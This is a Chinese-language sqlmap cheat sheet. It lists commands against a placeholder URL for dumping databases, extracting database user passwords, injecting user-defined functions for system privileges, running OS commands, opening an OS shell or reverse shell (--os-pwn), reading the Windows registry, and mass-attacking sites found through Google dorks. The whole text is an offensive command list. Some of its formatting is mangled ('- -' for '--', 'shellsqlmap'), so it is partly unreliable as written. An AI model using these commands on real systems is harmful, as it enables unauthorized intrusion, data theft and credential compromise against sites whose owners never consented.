#获取当前用户名称
sqlmap -u “http://url?id=1“ - -current-user
#获取当前数据库名称
sqlmap -u “http://url?id=1“ - -current-db
#列出给定数据库的所有表
sqlmap -u “http://url?id=1“ -D “db_name” - -tables
#列出指定库和指定表的所有列
sqlmap -u “http://url?id=1“ -D “db_name” -T “tablename” - -columns
#获取指定数据库指定表指定列的内容
sqlmap -u “http://url?id=1“ -D “db_name” -T “table_name” -C “column_name1,column_name2” - -dump
#确定是否为DBA
sqlmap -u “http://url?id=1“ - -is-dba
#查看权限
sqlmap -u “http://url?id=1“ - -privileges
#获取所有数据库用户密码
sqlmap -u “http://url?id=1“ - -passwords
#列出指定用户数据库密码
sqlmap -u “http://url?id=1“ - -passwords -U username
#列出所有数据库用户角色
sqlmap -u “http://url?id=1“ - -roles
#列出所有数据库用户
sqlmap -u “http://url?id=1“ - -users
#列出所有数据库名
sqlmap -u “http://url?id=1“ - -dbs
#查看指定用户权限
sqlmap -u “http://url?id=1“ - -privileges -U username
#导出所有数据库所有表
sqlmap -u “http://url?id=1“ - -dump-all
#导出指定字段的20条数据
sqlmap -u “http://url?id=1“ -D “db_name” -T “tablename” -C “password,user,id” - -dump - -start 1 - -stop 20
#导入用户自定义函数(获取系统权限!)
sqlmap -u “http://url?id=1“ - -udf-inject
#post注入
sqlmap -u “http://url?id=1“ - -data “id=3”
#代理注入
sqlmap -u “http://url?id=1“ - -proxy “http://127.0.0.1:8118“
#执行系统命令
sqlmap -u “http://url?id=1“ - -os-cmd=whoami
#系统交互
shellsqlmap -u “http://url?id=1“ - -os-shell
#执行指定sql命令
sqlmap -u “http://url?id=1“ - -sql-shell
#反弹shell
sqlmap -u “http://url?id=1“ - -os-pwn
#读取win系统注册表
sqlmap -u “http://url?id=1“ - -reg-read
#google搜索注入点自动跑出所有字段攻击实例
sqlmap -u “http://url?id=1“ -g “Google dork” - -dump-all - -batch